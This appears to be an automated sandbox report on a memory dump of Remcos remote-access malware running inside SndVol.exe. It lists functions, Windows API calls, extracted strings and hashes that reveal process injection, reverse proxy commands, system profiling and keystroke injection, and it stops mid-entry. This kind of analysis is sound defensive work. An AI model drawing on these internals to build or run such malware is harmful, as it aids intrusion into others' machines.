                                                                                                                        • __dosmaperr.LIBCMT ref: 0295945E
                                                                                                                        • _free.LIBCMT ref: 0295946A
                                                                                                                        • _free.LIBCMT ref: 02959471
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2441525078-0
                                                                                                                        • Opcode ID: 5e4308c3c6dbdd3713b45bd14543de28a010f559b3df563a8cb01066f30c8c96
                                                                                                                        • Instruction ID: db9b6a4516a30946e95b58c4749ff2aae7b4fe2ba9ab7ed53327c4655a548cd9
                                                                                                                        • Opcode Fuzzy Hash: 5e4308c3c6dbdd3713b45bd14543de28a010f559b3df563a8cb01066f30c8c96
                                                                                                                        • Instruction Fuzzy Hash: BC31BD72A0822AFBEF11AFA4DC48DBE7BBDAF40364B040158F81496280DB358D11DBA0
                                                                                                                        Function 02924E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetEvent.KERNEL32(?,?), ref: 02924E71
                                                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02924F21
                                                                                                                        • TranslateMessage.USER32(?), ref: 02924F30
                                                                                                                        • DispatchMessageA.USER32(?), ref: 02924F3B
                                                                                                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,02993F80), ref: 02924FF3
                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0292502B
                                                                                                                          • Part of subcall function 02924468: send.WS2_32(?,00000000,00000000,00000000), ref: 029244FD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                        • API String ID: 2956720200-749203953
                                                                                                                        • Opcode ID: 2c0d296f85e59cf23f8e131a118a1bab53f5a42707cff4ff2030ef4f312be2de
                                                                                                                        • Instruction ID: 0bd4ed57d48bb64e1ec7050fe2e34d75750b4f366d6a05dc9bbfadda1fb60549
                                                                                                                        • Opcode Fuzzy Hash: 2c0d296f85e59cf23f8e131a118a1bab53f5a42707cff4ff2030ef4f312be2de
                                                                                                                        • Instruction Fuzzy Hash: 10418072A083119BCB14FB78D8548AE77EAAFC5710F40092DF91A87198EF34D91DCB92
                                                                                                                        Function 02939128 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 174sleeptimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 0293912D
                                                                                                                        • GdiplusStartup.GDIPLUS(02993AF0,?,00000000), ref: 0293915F
                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 029391EB
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 0293926D
                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 0293927C
                                                                                                                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 02939365
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                        • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                        • API String ID: 489098229-3790400642
                                                                                                                        • Opcode ID: 502d1e17ab3c51041f40dd747b42f52e60875f39c98c082167adff496b4224ed
                                                                                                                        • Instruction ID: e77c60a1fe3b457b0a332866aead998b0aadae771ee9541a01ee9efa1918a341
                                                                                                                        • Opcode Fuzzy Hash: 502d1e17ab3c51041f40dd747b42f52e60875f39c98c082167adff496b4224ed
                                                                                                                        • Instruction Fuzzy Hash: 1951C071E002649BDF19FBB4DC54AFEBBBAAF90300F440469E04AA7185EF745E59CB90
                                                                                                                        Function 02975139 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,02975DAF), ref: 0297515C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DecodePointer
                                                                                                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                        • API String ID: 3527080286-3064271455
                                                                                                                        • Opcode ID: ffb79bd87ec54564bb4b574888814292e486aac73d4ca516e762a8aab9c74dd8
                                                                                                                        • Instruction ID: 111e57ef8d2bb19fa4f7c635a78be7149e11e0a155dac159876fe4b5efc793a6
                                                                                                                        • Opcode Fuzzy Hash: ffb79bd87ec54564bb4b574888814292e486aac73d4ca516e762a8aab9c74dd8
                                                                                                                        • Instruction Fuzzy Hash: F7517F70A0060ECBCF94DFA8DA4C5ADBBF8FF49314F9605C5D881AB264CB758924CB18
                                                                                                                        Function 029365FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0293665C
                                                                                                                          • Part of subcall function 0293B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02929F65), ref: 0293B633
                                                                                                                        • Sleep.KERNEL32(00000064), ref: 02936688
                                                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 029366BC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                        • API String ID: 1462127192-2001430897
                                                                                                                        • Opcode ID: 59960c4c0bac455a15bad6c850fbbb51e08db0a7a3ed0c6de63ad31a047d91a3
                                                                                                                        • Instruction ID: f4a244f8d362b3ecb663d47ed8b13b5e24a97545ceccfdfabb1215a894f81d55
                                                                                                                        • Opcode Fuzzy Hash: 59960c4c0bac455a15bad6c850fbbb51e08db0a7a3ed0c6de63ad31a047d91a3
                                                                                                                        • Instruction Fuzzy Hash: 723165319401299BDB18FBA0DCA1EFE777AAFD0714F040159E40A670D9EF705A8ECE94
                                                                                                                        Function 02926616 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 98COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(02994A28,00000000,029942E0,00003000,00000004,00000000,00000001), ref: 02926647
                                                                                                                        • GetCurrentProcess.KERNEL32(02994A28,00000000,00008000,?,00000000,00000001,00000000,029268BB,C:\Windows\SysWOW64\SndVol.exe), ref: 02926705
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentProcess
                                                                                                                        • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                                                        • API String ID: 2050909247-4242073005
                                                                                                                        • Opcode ID: bfcdc23b9d25a66aa7fa805280b555dd41ead34ef0c035b82f89cc3182beb24e
                                                                                                                        • Instruction ID: 21484231d52b33e14e0a406eae7f6a02e1854b5b5b40b2aa2685196aa1b3318d
                                                                                                                        • Opcode Fuzzy Hash: bfcdc23b9d25a66aa7fa805280b555dd41ead34ef0c035b82f89cc3182beb24e
                                                                                                                        • Instruction Fuzzy Hash: 0A31E571A44300AFE311BB68EC44F7A77AEFB84726F41481CF54582988E77094199F28
                                                                                                                        Function 0293C96F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0293C988
                                                                                                                          • Part of subcall function 0293CA1F: RegisterClassExA.USER32(00000030), ref: 0293CA6C
                                                                                                                          • Part of subcall function 0293CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0293CA87
                                                                                                                          • Part of subcall function 0293CA1F: GetLastError.KERNEL32 ref: 0293CA91
                                                                                                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0293C9BF
                                                                                                                        • lstrcpynA.KERNEL32(02993B68,Remcos,00000080), ref: 0293C9D9
                                                                                                                        • Shell_NotifyIconA.SHELL32(00000000,02993B50), ref: 0293C9EF
                                                                                                                        • TranslateMessage.USER32(?), ref: 0293C9FB
                                                                                                                        • DispatchMessageA.USER32(?), ref: 0293CA05
                                                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0293CA12
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                        • String ID: Remcos
                                                                                                                        • API String ID: 1970332568-165870891
                                                                                                                        • Opcode ID: ee0ac7222a23b45f01a0f96757efcf0ec0a38d64c2afd02462b56b958cfb8b02
                                                                                                                        • Instruction ID: 095af25468be4d7761d67fa810c75ce88da41a04c0768913e6612d3f1c2278b1
                                                                                                                        • Opcode Fuzzy Hash: ee0ac7222a23b45f01a0f96757efcf0ec0a38d64c2afd02462b56b958cfb8b02
                                                                                                                        • Instruction Fuzzy Hash: 3401E1B1D88244ABE710AFA9EC4CEFBBBBCA785B14F004859E605E6440D7B49459CB64
                                                                                                                        Function 0296B450 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bbbc9341efa5637a06582ee44543c086bc3e961812a71c841b2adcfc50e9cf28
                                                                                                                        • Instruction ID: d35879cef942ff684321babd81fd3cbd3369d951a6c8c93afd36565466fc74ef
                                                                                                                        • Opcode Fuzzy Hash: bbbc9341efa5637a06582ee44543c086bc3e961812a71c841b2adcfc50e9cf28
                                                                                                                        • Instruction Fuzzy Hash: C9C1BE70E04249AFCB11DFA9C868BBDBBF9AF4A318F084089E514F7391E7709951CB60
                                                                                                                        Function 02972B2A Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,02972E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 02972BD6
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,02972E03,00000000,00000000,?,00000001,?,?,?,?), ref: 02972C59
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 02972C91
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,02972E03,?,02972E03,00000000,00000000,?,00000001,?,?,?,?), ref: 02972CEC
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 02972D3B
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,02972E03,00000000,00000000,?,00000001,?,?,?,?), ref: 02972D03
                                                                                                                          • Part of subcall function 02966AFF: RtlAllocateHeap.NTDLL(00000000,0292E5AC,00000000,?,02953627,0292E5AC,?,02922BE9,029942E0,02922F1C,00000000,029942E0,029284A8,?,?,029942E0), ref: 02966B31
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,02972E03,00000000,00000000,?,00000001,?,?,?,?), ref: 02972D7F
                                                                                                                        • __freea.LIBCMT ref: 02972DAA
                                                                                                                        • __freea.LIBCMT ref: 02972DB6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 201697637-0
                                                                                                                        • Opcode ID: d462671aa1968c7ae108f929df57e6c8bc0668dbc9cda9e6625966438e731dfb
                                                                                                                        • Instruction ID: 92076007844367234a473efd71aa8d47d66e06064f0e927dc8ef8ed1f6df7514
                                                                                                                        • Opcode Fuzzy Hash: d462671aa1968c7ae108f929df57e6c8bc0668dbc9cda9e6625966438e731dfb
                                                                                                                        • Instruction Fuzzy Hash: 84918472E202169BDB248F74CC95EEEBBB9EF49754F18456AEC05E7140E735D880CBA0
                                                                                                                        Function 029643F9 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02966EBF: GetLastError.KERNEL32(?,00000000,02960A45,?,0293AB73,-02995D4C,?,?,?,?,02985900,0292C07B,.vbs), ref: 02966EC3
                                                                                                                          • Part of subcall function 02966EBF: _free.LIBCMT ref: 02966EF6
                                                                                                                          • Part of subcall function 02966EBF: SetLastError.KERNEL32(00000000,?,0293AB73,-02995D4C,?,?,?,?,02985900,0292C07B,.vbs), ref: 02966F37
                                                                                                                          • Part of subcall function 02966EBF: _abort.LIBCMT ref: 02966F3D
                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 029646A3
                                                                                                                        • _free.LIBCMT ref: 02964714
                                                                                                                        • _free.LIBCMT ref: 0296472D
                                                                                                                        • _free.LIBCMT ref: 0296475F
                                                                                                                        • _free.LIBCMT ref: 02964768
                                                                                                                        • _free.LIBCMT ref: 02964774
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                        • String ID: C
                                                                                                                        • API String ID: 1679612858-1037565863
                                                                                                                        • Opcode ID: c4a20283dc4e88a1e1aedd48a74d81f919da95d6ef770927eb908c5e44c30e6c
                                                                                                                        • Instruction ID: f527d5d3076ee864968be8c4358c561f382222e9c3df5f6517b60f9ccf9df9ed
                                                                                                                        • Opcode Fuzzy Hash: c4a20283dc4e88a1e1aedd48a74d81f919da95d6ef770927eb908c5e44c30e6c
                                                                                                                        • Instruction Fuzzy Hash: 7CB12975A012199FDB24DF58C888BADB7F9FF48314F5485AAD909A7350D731AE90CF40
                                                                                                                        Function 029339C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: tcp$udp
                                                                                                                        • API String ID: 0-3725065008
                                                                                                                        • Opcode ID: a22542f5ea5581f79c9e19c7d4a33da9060c8e78fc5fa85139244f0cf7fdb279
                                                                                                                        • Instruction ID: cc5d81e3184d88bf98bd8052cf2ff374962e33020aa5b58ae9928ace1c4f1aa5
                                                                                                                        • Opcode Fuzzy Hash: a22542f5ea5581f79c9e19c7d4a33da9060c8e78fc5fa85139244f0cf7fdb279
                                                                                                                        • Instruction Fuzzy Hash: 7D71BD30A883128FEB26DE55848473BB6E9AF84749F0409BEFC86D7250D774C944CBDA
                                                                                                                        Function 02930314 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 192COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Eventinet_ntoa
                                                                                                                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                                                                                        • API String ID: 3578746661-168337528
                                                                                                                        • Opcode ID: 6fb5c870e1e36b1a522cdf167b06971ee4d9485d4bc6f3f094553bfac1cb551a
                                                                                                                        • Instruction ID: 7e1c6e0d2fb90388d2c760d8ffb8027e80dbd37166d40db81001a86cc30d0482
                                                                                                                        • Opcode Fuzzy Hash: 6fb5c870e1e36b1a522cdf167b06971ee4d9485d4bc6f3f094553bfac1cb551a
                                                                                                                        • Instruction Fuzzy Hash: 6151C532E483119BC705FB3CD855A7E36AAAFC0720F444919E41D872D9DF259D18CF92
                                                                                                                        Function 02936E27 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 107filesynchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,02985554), ref: 02936F24
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02936F2D
                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 02936F3C
                                                                                                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 02936EF0
                                                                                                                          • Part of subcall function 02924468: send.WS2_32(?,00000000,00000000,00000000), ref: 029244FD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                                        • String ID: <$@$Temp
                                                                                                                        • API String ID: 1107811701-1032778388
                                                                                                                        • Opcode ID: 210e28a06e63f07b0f8c9369eb632a55bd30cf242960783a124c4ec6f94b9fb2
                                                                                                                        • Instruction ID: 8a09a79a54a2ee396416269de4bfee60aada7091095a4564669c3e1235e453e8
                                                                                                                        • Opcode Fuzzy Hash: 210e28a06e63f07b0f8c9369eb632a55bd30cf242960783a124c4ec6f94b9fb2
                                                                                                                        • Instruction Fuzzy Hash: E5319F31D002299BDB15FBA4DC55AFEB77AAF90314F400128E41A6A0D9EF701A9ECF91
                                                                                                                        Function 02926BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,02985454,?,?,00000000,02927273,00000000,?,0000000A,00000000), ref: 02926C38
                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,02927273,00000000,?,0000000A,00000000), ref: 02926C80
                                                                                                                          • Part of subcall function 02924468: send.WS2_32(?,00000000,00000000,00000000), ref: 029244FD
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,02927273,00000000,?,0000000A,00000000,00000000), ref: 02926CC0
                                                                                                                        • MoveFileW.KERNEL32(00000000,00000000), ref: 02926CDD
                                                                                                                        • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 02926D08
                                                                                                                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 02926D18
                                                                                                                          • Part of subcall function 0292455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0292460E,00000000,?,?), ref: 0292456A
                                                                                                                          • Part of subcall function 0292455B: SetEvent.KERNEL32(?,?,?,0292460E,00000000,?,?), ref: 02924588
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                        • String ID: .part
                                                                                                                        • API String ID: 1303771098-3499674018
                                                                                                                        • Opcode ID: c33b3c9bea24aa7cd0c010020bdf75eb3fa2ba880815b9609da35cc0ae600a0e
                                                                                                                        • Instruction ID: b307a913e86a69e10e96a1dd6525559c6cfb402a1d63d5eca663114935adf443
                                                                                                                        • Opcode Fuzzy Hash: c33b3c9bea24aa7cd0c010020bdf75eb3fa2ba880815b9609da35cc0ae600a0e
                                                                                                                        • Instruction Fuzzy Hash: CC31A971948321AFC210EF60DC849EFB7ADFBC4711F00492EF995A2154DB70AA4CCBA2
                                                                                                                        Function 02969950 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0295D564,0295D564,?,?,?,02969BA1,00000001,00000001,1AE85006), ref: 029699AA
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 029699E2
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,02969BA1,00000001,00000001,1AE85006,?,?,?), ref: 02969A30
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 02969AC7
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02969B2A
                                                                                                                        • __freea.LIBCMT ref: 02969B37
                                                                                                                          • Part of subcall function 02966AFF: RtlAllocateHeap.NTDLL(00000000,0292E5AC,00000000,?,02953627,0292E5AC,?,02922BE9,029942E0,02922F1C,00000000,029942E0,029284A8,?,?,029942E0), ref: 02966B31
                                                                                                                        • __freea.LIBCMT ref: 02969B40
                                                                                                                        • __freea.LIBCMT ref: 02969B65
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3864826663-0
                                                                                                                        • Opcode ID: f5dc4fc11445216a7a7a74603acc97844f74bf1861e8ac4200050c3261529cd1
                                                                                                                        • Instruction ID: 1b3f27efeea7a378f004bb786a5443fd282343072f85b1eb60688b323396e1ea
                                                                                                                        • Opcode Fuzzy Hash: f5dc4fc11445216a7a7a74603acc97844f74bf1861e8ac4200050c3261529cd1
                                                                                                                        • Instruction Fuzzy Hash: CA51DD72A10216AFFB258E74DC88EBB77EEEB84654F15462EFC14D6140EB34DC40CAA0
                                                                                                                        Function 02938ABE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendInput.USER32 ref: 02938B08
                                                                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 02938B30
                                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 02938B57
                                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 02938B75
                                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 02938B95
                                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 02938BBA
                                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 02938BDC
                                                                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 02938BFF
                                                                                                                          • Part of subcall function 02938AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 02938AB7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InputSend$Virtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1167301434-0
                                                                                                                        • Opcode ID: fc2577fde5b75c17f899923718ec5858afdf759b0479a517dfd3e698f4216c4f
                                                                                                                        • Instruction ID: 90cc2952f959ab9d788ea899c4c33aae66541f2963d42fe0b608561d62af11f4
